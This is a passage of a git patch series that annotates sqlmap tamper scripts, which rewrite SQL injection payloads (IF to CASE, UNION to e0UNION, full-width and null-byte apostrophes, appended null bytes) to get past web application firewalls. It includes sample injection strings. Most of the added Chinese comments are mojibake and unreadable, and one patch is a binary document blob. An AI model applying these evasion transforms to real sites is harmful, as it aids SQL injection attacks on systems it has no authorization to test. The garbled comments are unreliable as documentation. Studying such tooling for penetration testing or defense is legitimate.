From e12d3d9d99e1e364ce5d75a7bd7ea61f6cfad9e0 Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Wed, 23 Oct 2024 18:42:08 +0800 Subject: [PATCH 1/9] =?UTF-8?q?=E7=BB=95=E8=BF=87=E9=98=B2=E7=81=AB?= =?UTF-8?q?=E5=A2=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/chardoubleencode.py | 1 + 1 file changed, 1 insertion(+) diff --git a/src/sqlmap-master/tamper/chardoubleencode.py b/src/sqlmap-master/tamper/chardoubleencode.py index ea711b4..e4eb824 100644 --- a/src/sqlmap-master/tamper/chardoubleencode.py +++ b/src/sqlmap-master/tamper/chardoubleencode.py @@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission """ import string +# 导入 Python 的 string 模块,它包含了许多用于字符串操作的常量和类 from lib.core.enums import PRIORITY From ac4550a65dc0b752a236b87a5a0acf85708bb87c Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 16 Dec 2024 21:30:04 +0800 Subject: [PATCH 2/9] =?UTF-8?q?=E4=BF=AE=E6=94=B9if2case?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/if2case.py | 81 ++++++++++++++--------------- 1 file changed, 40 insertions(+), 41 deletions(-) diff --git a/src/sqlmap-master/tamper/if2case.py b/src/sqlmap-master/tamper/if2case.py index 2e3a01f..125f66d 100644 --- a/src/sqlmap-master/tamper/if2case.py +++ b/src/sqlmap-master/tamper/if2case.py @@ -5,18 +5,19 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY -from lib.core.settings import REPLACEMENT_MARKER +from lib.core.compat import xrange # 鐢ㄤ簬鍏煎Python 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import REPLACEMENT_MARKER # 瀵煎叆鏇挎崲鏍囪 -__priority__ = PRIORITY.HIGHEST +__priority__ = PRIORITY.HIGHEST # 璁剧疆浼樺厛绾т负鏈楂 def dependencies(): + """姝ゅ嚱鏁扮敤浜庡畾涔夋tamper鍑芥暟鐨勪緷璧栭」銆傚綋鍓嶅疄鐜颁负绌猴紝鏍规嵁闇瑕佸彲浠ユ坊鍔犲叿浣撶殑渚濊禆椤""" pass def tamper(payload, **kwargs): """ - Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart + 鏇挎崲IF鏉′欢琛ㄨ揪寮忎负CASE琛ㄨ揪寮 Requirement: * MySQL @@ -27,45 +28,43 @@ def tamper(payload, **kwargs): * MySQL 5.0 and 5.5 Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IF() functions + * 閫傜敤浜庣粫杩囬潪甯稿急涓斿畾鍒剁殑web搴旂敤绋嬪簭闃茬伀澧欙紝璇ラ槻鐏杩囨护浜咺F()鍑芥暟 - >>> tamper('IF(1, 2, 3)') - 'CASE WHEN (1) THEN (2) ELSE (3) END' - >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') - 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' - """ - - if payload and payload.find("IF") > -1: - payload = payload.replace("()", REPLACEMENT_MARKER) - while payload.find("IF(") > -1: - index = payload.find("IF(") - depth = 1 - commas, end = [], None - - for i in xrange(index + len("IF("), len(payload)): - if depth == 1 and payload[i] == ',': - commas.append(i) + Examples: + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' - elif depth == 1 and payload[i] == ')': - end = i - break - - elif payload[i] == '(': - depth += 1 - - elif payload[i] == ')': - depth -= 1 + >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') + 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' + """ - if len(commas) == 2 and end: - a = payload[index + len("IF("):commas[0]].strip("()") - b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") - c = payload[commas[1] + 1:end].lstrip().strip("()") - newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) - payload = payload[:index] + newVal + payload[end + 1:] + if payload and payload.find("IF") > -1: # 妫鏌ayload鏄惁鍖呭惈IF + payload = payload.replace("()", REPLACEMENT_MARKER) # 鏇挎崲绌虹殑()涓篟EPLACEMENT_MARKER + while payload.find("IF(") > -1: # 妫鏌ayload涓槸鍚﹁繕鍖呭惈IF( + index = payload.find("IF(") # 鎵惧埌IF(鐨勪綅缃 + depth = 1 # 鍒濆鍖栨繁搴﹁鏁板櫒 + commas, end = [], None # 鍒濆鍖栭楀彿鍒楄〃鍜岀粨鏉熶綅缃 + + for i in xrange(index + len("IF("), len(payload)): # 閬嶅巻IF(鍚庣殑瀛愪覆 + if depth == 1 and payload[i] == ',': # 濡傛灉娣卞害涓1涓旈亣鍒伴楀彿 + commas.append(i) # 璁板綍閫楀彿浣嶇疆 + elif depth == 1 and payload[i] == ')': # 濡傛灉娣卞害涓1涓旈亣鍒板彸鎷彿 + end = i # 璁板綍缁撴潫浣嶇疆 + break # 缁撴潫寰幆 + elif payload[i] == '(': # 濡傛灉閬囧埌宸︽嫭鍙 + depth += 1 # 澧炲姞娣卞害 + elif payload[i] == ')': # 濡傛灉閬囧埌鍙虫嫭鍙 + depth -= 1 # 鍑忓皯娣卞害 + + if len(commas) == 2 and end: # 濡傛灉鏈2涓楀彿骞朵笖鏈夌粨鏉熶綅缃 + a = payload[index + len("IF("):commas[0]].strip("()") # 鎻愬彇绗竴涓弬鏁 + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") # 鎻愬彇绗簩涓弬鏁 + c = payload[commas[1] + 1:end].lstrip().strip("()") # 鎻愬彇绗笁涓弬鏁 + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) # 鏋勯燙ASE琛ㄨ揪寮 + payload = payload[:index] + newVal + payload[end + 1:] # 鏇挎崲IF()涓篊ASE else: - break + break # 濡傛灉涓嶇鍚堟潯浠讹紝璺冲嚭寰幆 - payload = payload.replace(REPLACEMENT_MARKER, "()") + payload = payload.replace(REPLACEMENT_MARKER, "()") # 灏哛EPLACEMENT_MARKER鏇挎崲鍥()锛岄槻姝㈠奖鍝嶅叾浠栭儴鍒 - return payload + return payload \ No newline at end of file From b2880b499320c050bf54d2910d89b1f5c9c1109f Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 16 Dec 2024 21:31:02 +0800 Subject: [PATCH 3/9] =?UTF-8?q?=E4=BF=AE=E6=94=B9doc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- doc/sqlmap-娉涜鎶ュ憡.docx | Bin 0 -> 9999 bytes 1 file changed, 0 insertions(+), 0 deletions(-) diff --git a/doc/sqlmap-娉涜鎶ュ憡.docx b/doc/sqlmap-娉涜鎶ュ憡.docx index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..fd2395a3afc52376abfb989e69a0920868f3377e 100644 GIT binary patch literal 9999 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

hkCPeu513ucU2dWi#4mcjB}OR&_hl6bI(gBIGQ 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 Date: Tue, 24 Dec 2024 21:32:56 +0800 Subject: [PATCH 4/9] =?UTF-8?q?2024-12-24=2021=EF=BC=9A32?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/0eunion.py | 35 ++++++++++++------- src/sqlmap-master/tamper/apostrophemask.py | 20 +++++++---- .../tamper/apostrophenullencode.py | 22 +++++++++--- src/sqlmap-master/tamper/appendnullbyte.py | 31 +++++++++------- 4 files changed, 73 insertions(+), 35 deletions(-) diff --git a/src/sqlmap-master/tamper/0eunion.py b/src/sqlmap-master/tamper/0eunion.py index 9342053..aee154a 100644 --- a/src/sqlmap-master/tamper/0eunion.py +++ b/src/sqlmap-master/tamper/0eunion.py @@ -9,24 +9,35 @@ import re from lib.core.enums import PRIORITY -__priority__ = PRIORITY.HIGHEST +__priority__ = PRIORITY.HIGHEST # 璁剧疆浼樺厛绾т负鏈楂 def dependencies(): pass def tamper(payload, **kwargs): """ - Replaces instances of UNION with e0UNION - - Requirement: - * MySQL - * MsSQL - - Notes: - * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf - - >>> tamper('1 UNION ALL SELECT') - '1e0UNION ALL SELECT' + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屼互缁曡繃鏌愪簺瀹夊叏闃叉姢鎺柦銆 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 灏唒ayload涓殑 UNION鏇挎崲涓e0UNION锛屼互灏濊瘯缁曡繃瀹夊叏闃叉姢銆 + + 瑕佹眰锛 + * 閫傜敤浜嶮ySQL鍜孧sSQL鏁版嵁搴撱 + + 娉ㄦ剰锛 + * 鍙傝冩枃妗o細https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + * 璇ュ嚱鏁板亣璁捐緭鍏ョ殑payload鏄湁鏁堢殑锛屽苟涓斾笉杩涜浠讳綍閿欒澶勭悊銆 + + 绀轰緥锛 + >>> tamper('1 UNION ALL SELECT') + '1e0UNION ALL SELECT' """ + + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑鏁板瓧鍜孶NION涔嬮棿鐨勭┖鏍间负'e0' + # \g<1>琛ㄧず鍖归厤鐨勭涓涓嫭鍙蜂腑鐨勫唴瀹癸紝\g<2>琛ㄧず绗簩涓嫭鍙蜂腑鐨勫唴瀹 return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>e0\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/apostrophemask.py b/src/sqlmap-master/tamper/apostrophemask.py index 113b5bf..0eaf56e 100644 --- a/src/sqlmap-master/tamper/apostrophemask.py +++ b/src/sqlmap-master/tamper/apostrophemask.py @@ -7,23 +7,31 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): pass def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨勫崟寮曞彿瀛楃锛'锛夋浛鎹负鍏禪TF-8鍏ㄨ瀛楃瀵瑰簲鐗┿ - References: + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 灏唒ayload涓殑鍗曞紩鍙凤紙'锛夋浛鎹负UTF-8缂栫爜鐨勫叏瑙掑崟寮曞彿锛%EF%BC%87锛夛紝鐢ㄤ簬缁曡繃鏌愪簺瀹夊叏闃叉姢鎺柦銆 + + 鍙傝冮摼鎺ワ細 * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/ * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850 * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps - >>> tamper("1 AND '1'='1") - '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' + 绀轰緥锛 + >>> tamper("1 AND '1'='1") + '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' """ - + # 鏇挎崲payload涓殑鍗曞紩鍙蜂负UTF-8鍏ㄨ鍗曞紩鍙 return payload.replace('\'', "%EF%BC%87") if payload else payload diff --git a/src/sqlmap-master/tamper/apostrophenullencode.py b/src/sqlmap-master/tamper/apostrophenullencode.py index 7a3cd18..d850c00 100644 --- a/src/sqlmap-master/tamper/apostrophenullencode.py +++ b/src/sqlmap-master/tamper/apostrophenullencode.py @@ -7,17 +7,29 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): + """ + 杩欎釜鍑芥暟鐢ㄤ簬瀹氫箟渚濊禆鍏崇郴锛屼絾鍦ㄥ綋鍓嶈剼鏈腑鏈疄鐜颁换浣曞姛鑳姐 + 閫氬父锛岃繖涓嚱鏁扮敤浜庢鏌ュ綋鍓嶅嚱鏁版墍闇鐨勪緷璧栨槸鍚︽弧瓒炽 + """ pass def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨勫崟寮曞彿瀛楃锛'锛夋浛鎹负鍏堕潪娉曠殑鍙孶nicode缂栫爜瀵瑰簲鐗┿ + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 灏唒ayload涓殑鍗曞紩鍙凤紙'锛夋浛鎹负%00%27锛岃繖鏄竴绉嶉潪娉曠殑Unicode缂栫爜鏂瑰紡锛岀敤浜庣粫杩囨煇浜涘畨鍏ㄩ槻鎶ゆ帾鏂姐 - >>> tamper("1 AND '1'='1") - '1 AND %00%271%00%27=%00%271' + 绀轰緥锛 + >>> tamper("1 AND '1'='1") + '1 AND %00%271%00%27=%00%271' """ - return payload.replace('\'', "%00%27") if payload else payload + return payload.replace('\'', "%00%27") if payload else payload # 鏇挎崲payload涓殑鍗曞紩鍙蜂负%00%27 diff --git a/src/sqlmap-master/tamper/appendnullbyte.py b/src/sqlmap-master/tamper/appendnullbyte.py index 5fda08b..2493e70 100644 --- a/src/sqlmap-master/tamper/appendnullbyte.py +++ b/src/sqlmap-master/tamper/appendnullbyte.py @@ -15,23 +15,30 @@ __priority__ = PRIORITY.LOWEST def dependencies(): singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS)) - + # 鏄剧ず璀﹀憡淇℃伅锛屾寚鍑鸿tamper鑴氭湰浠呴傜敤浜嶮icrosoft Access鏁版嵁搴 def tamper(payload, **kwargs): """ - Appends (Access) NULL byte character (%00) at the end of payload + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鍦ㄦ湯灏炬坊鍔犱竴涓狽ULL瀛楄妭锛%00锛夈 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 